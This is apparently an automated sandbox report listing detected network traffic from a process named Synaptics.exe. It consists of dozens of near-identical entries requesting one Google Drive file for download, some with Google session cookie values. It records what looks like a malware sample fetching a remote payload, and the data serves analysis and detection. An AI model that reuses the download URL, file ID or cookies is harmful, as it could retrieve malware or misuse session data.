                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dbP6m55jOXmeVvqf-7qrAR5nN00yk5-K2vW_Lpg8QyEEmyYAEb7WZbn2-VL6F7gw223sN9c-SdEQElGxRoejvcg5joy6HyynSuxtgMaGou9ZayiFWm5NmnXs-YzZKaWL928ckLLAGkuaTJNA-zjQjYOyBK5qxNRt_7QjX5pDLyjaoYfpZWA-5Aae
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=dbP6m55jOXmeVvqf-7qrAR5nN00yk5-K2vW_Lpg8QyEEmyYAEb7WZbn2-VL6F7gw223sN9c-SdEQElGxRoejvcg5joy6HyynSuxtgMaGou9ZayiFWm5NmnXs-YzZKaWL928ckLLAGkuaTJNA-zjQjYOyBK5qxNRt_7QjX5pDLyjaoYfpZWA-5Aae
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
                            Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj
